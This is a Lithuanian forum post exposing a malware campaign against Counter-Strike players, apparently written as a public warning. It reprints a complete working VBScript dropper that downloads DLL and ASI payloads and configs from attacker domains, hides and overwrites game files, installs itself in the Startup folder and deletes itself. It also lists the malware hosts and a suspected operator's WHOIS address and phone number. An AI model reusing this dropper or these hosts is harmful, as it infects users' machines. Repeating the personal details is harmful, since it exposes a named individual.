Parazitas pasitelkiant budus, uzkreciant klientus per farmserverius kurie patampa botnetu atsiunciant nekaltam client'ui failus naudojant vb scripta ir cs launcheri kaip atsiustu dll injectoriu, sudarkant zaidimo failus ir aibe kitu.
Prisegta virusiniu failu offline versija jeigu netycia parazitas "sumetytu pedas" atsiusta naudojantis httrack programa analizei kaip irodymas, jie paimti is:
http://www.upload.ee/files/5405822/web_ ... k.rar.html
ms-shadow.ro/NexonUp
stockdownload.eu/NexonCs
vipsmiley.cf/NexonCs
vienas is parazitu failu:
Code: Select all
Sub unProtectFile( filename ) dim readfile, filesys set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FileExists( filename ) Then set readfile = filesys.GetFile( filename ) readfile.Attributes = 0 ' normal End IfEnd Sub Sub protectFile( filename ) dim readfile, filesys set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FileExists( filename ) Then set readfile = filesys.GetFile( filename ) readfile.Attributes = 7 ' hidden + system + readonly End IfEnd Sub Sub DeleteAFile( filename ) Dim filesys Set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FileExists( filename ) Then unProtectFile( filename ) filesys.DeleteFile( filename ), True End IfEnd Sub Sub RenameFile( oldName, newName ) Dim filesys Set filesys = WScript.CreateObject("Scripting.FileSystemObject") If filesys.FileExists( oldName ) Then filesys.MoveFile oldName, newName End IfEnd Sub Sub ClearCFG( path ) DeleteAFile path Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile(path, ForWriting) objFile.Write "" objFile.Close protectFile pathEnd Sub Sub DeleteAFolder( foldername ) Dim filesys Set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FolderExists( foldername ) Then ' unProtectFile( foldername ) filesys.DeleteFolder( foldername ), True End IfEnd Sub Sub RenameFolder( oldName, newName ) Dim filesys Set filesys = WScript.CreateObject("Scripting.FileSystemObject") If filesys.FolderExists( oldName ) Then filesys.MoveFolder oldName, newName End IfEnd Sub strURL="http://ms-shadow.ro/NexonUp/GTProtector.dll?" & RndOn Error Resume Next Set xml = CreateObject("Microsoft.XMLHTTP") xml.Open "GET", strURL, False xml.Send If Err.Number <> 0 Then WScript.Quit ' if file download fails, quit script Else set oStream = createobject("Adodb.Stream") oStream.type = 1 ' adTypeBinary oStream.open oStream.write xml.responseBody ' overwrite oStream.savetofile "GTProtector.dll.upk", 2 ' adSaveCreateOverWrite oStream.close set oStream = nothing Set xml = Nothing End If Err.ClearOn Error Goto 0 strURL="http://ms-shadow.ro/NexonUp/GTProtector.asi?" & RndOn Error Resume Next Set xml = CreateObject("Microsoft.XMLHTTP") xml.Open "GET", strURL, False xml.Send If Err.Number <> 0 Then WScript.Quit ' if file download fails, quit script Else set oStream = createobject("Adodb.Stream") oStream.type = 1 ' adTypeBinary oStream.open oStream.write xml.responseBody ' overwrite oStream.savetofile "GTProtector.asi.upk", 2 ' adSaveCreateOverWrite oStream.close set oStream = nothing Set xml = Nothing End If Err.ClearOn Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GTProtector.ini?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "GTProtector.ini.upk" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("GTProtector.ini.upk", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("GTProtector.ini.upk") End If On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "config\MasterServers.vdf" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("config\MasterServers.vdf", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("config\MasterServers.vdf") End If On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "config\rev_MasterServers.vdf" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("config\rev_MasterServers.vdf", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("config\rev_MasterServers.vdf") End If On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "platform\config\MasterServers.vdf" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("platform\config\MasterServers.vdf", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("platform\config\MasterServers.vdf") End If On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "platform\config\rev_MasterServers.vdf" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("platform\config\rev_MasterServers.vdf", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("platform\config\rev_MasterServers.vdf") End If On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "config\ServerBrowser.vdf" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("config\ServerBrowser.vdf", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("config\ServerBrowser.vdf") End If On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "platform\config\ServerBrowser.vdf" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("platform\config\ServerBrowser.vdf", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("platform\config\ServerBrowser.vdf") End If On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GameMenu.res?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "cstrike\resource\GameMenu.res" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("cstrike\resource\GameMenu.res", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("cstrike\resource\GameMenu.res") End If On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/userconfig.cfg?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "cstrike\userconfig.cfg" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("cstrike\userconfig.cfg", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("cstrike\userconfig.cfg") End If On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "cstrike\motd_temp.html.old" RenameFile "cstrike\motd_temp.html", "cstrike\motd_temp.html.old" DeleteAFile "cstrike\motd_temp.html" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("cstrike\motd_temp.html", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("cstrike\motd_temp.html") End If On Error Goto 0 On Error Resume Next ClearCFG "cstrike\hw\geforce.cfg" ClearCFG "cstrike\hw\opengl.cfg" ClearCFG "cstrike\autoexec.cfg" ' ClearCFG "cstrike\userconfig.cfg" ClearCFG "cstrike\valve.rc" ClearCFG "valve\hw\geforce.cfg" ClearCFG "valve\hw\opengl.cfg" ClearCFG "valve\valve.rc"On Error Goto 0 CreateObject("WScript.Shell").Run("taskkill /f /im hl.exe") WScript.Sleep(3000) On Error Resume Next DeleteAFolder "cstrike\bin_old" DeleteAFile "cstrike\bin_old" DeleteAFile "GTProtector.dll.old" DeleteAFile "GTProtector.asi.old" DeleteAFile "GTProtector.ini.old" RenameFolder "cstrike\bin", "cstrike\bin_old" RenameFile "cstrike\bin", "cstrike\bin_old" RenameFile "GTProtector.dll", "GTProtector.dll.old" RenameFile "GTProtector.asi", "GTProtector.asi.old" RenameFile "GTProtector.ini", "GTProtector.ini.old" RenameFile "GTProtector.dll.upk", "GTProtector.dll" RenameFile "GTProtector.asi.upk", "GTProtector.asi" RenameFile "GTProtector.ini.upk", "GTProtector.ini" protectFile("GTProtector.dll") protectFile("GTProtector.asi") protectFile("GTProtector.ini") protectFile("cstrike\liblist.gam") DeleteAFile "cstrike\bin\TrackerUI.dll" DeleteAFile "valve\bin\TrackerUI.dll" DeleteAFile "cstrike\cl_dlls\ParticleMan.dll" DeleteAFile "NexonUp.asi" DeleteAFile "CsShield.dll" RenameFile "cstrike\bin\TrackerUI.dll", "cstrike\bin\TrackerUI.dll.old" RenameFile "valve\bin\TrackerUI.dll", "valve\bin\TrackerUI.dll.old" RenameFile "cstrike\cl_dlls\ParticleMan.dll", "cstrike\cl_dlls\ParticleMan.dll.old" RenameFile "NexonUp.asi", "NexonUp.asi.old" RenameFile "CsShield.dll", "CsShield.dll.old" DeleteAFile "cstrike\bin\TrackerUI.dll.old" DeleteAFile "valve\bin\TrackerUI.dll.old" DeleteAFile "cstrike\cl_dlls\ParticleMan.dll.old" DeleteAFile "NexonUp.asi.old" DeleteAFile "CsShield.dll.old" DeleteAFile "mssv55.asi.old" RenameFile "mssv55.asi", "mssv55.asi.old" DeleteAFile "msvv82.asi.old" RenameFile "msvv82.asi", "msvv82.asi.old" On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "cstrike\bin" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("cstrike\bin", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("cstrike\bin") End If On Error Goto 0 CreateObject("WScript.Shell").Run("hl.exe -steam -game cstrike -noforcemparms -noforcemaccel") Sub Up() Set objShell = Wscript.CreateObject("Wscript.Shell")strPath = objShell.SpecialFolders("StartUp")strMyPath = strPath & "\" On Error Resume Next Dim filesysSet filesys = CreateObject("Scripting.FileSystemObject") filesys.DeleteFile( strMyPath & "*.vbs" ), True On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/NexonUp.vbs?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile strMyPath & "NexonUp.vbs" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile(strMyPath & "NexonUp.vbs", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close ' protectFile(strMyPath & "NexonUp.vbs") End If On Error Goto 0 CreateObject("WScript.Shell").Run(Chr(34) & strMyPath & "NexonUp.vbs" & Chr(34)) End Sub Up() On Error Resume Next WScript.Sleep 1000 Set fileSystem = CreateObject("Scripting.FileSystemObject") thisScript = Wscript.ScriptFullName fileSystem.DeleteFile(thisScript)On Error Goto 0
pagrindinis projektas - parazito galva i kuri eina srautas: indungi.ro
salutiniai projektai:
bestia.ro
csgofade.net
ms-boost.com
ms-shadow.ro
vipsmiley.cf
stockdownload.eu
nariai:
anaconda, unpack pagal http://www.extreamcs.com/
nariu domreg info:
Admin Name: Costinel Danut Onofrei
Admin Organization: N/A
Admin Street: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin City: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin State/Province: Iasi
Admin Postal Code: 73579
Admin Country: RO
Admin Phone: +40.0752811205
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: [email protected]
_
Registrant Name: Emran Costin
Registrant Organization: CSGOFADE.NET
Registrant Street: Germany Germany
Registrant City: Germany
Registrant State/Province: Iasi
Registrant Postal Code: 73579
Registrant Country: RO
Registrant Phone: +00.34123232521
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]
Registry Admin ID:
idomus link'as:
stockdownload.eu/NexonPanel
post'as skirtas edukaciniais tikslais istempti parazitus i dienos sviesa, bet koks failu naudojamas uzkreciant klienta yra baudziamas pagal istatymus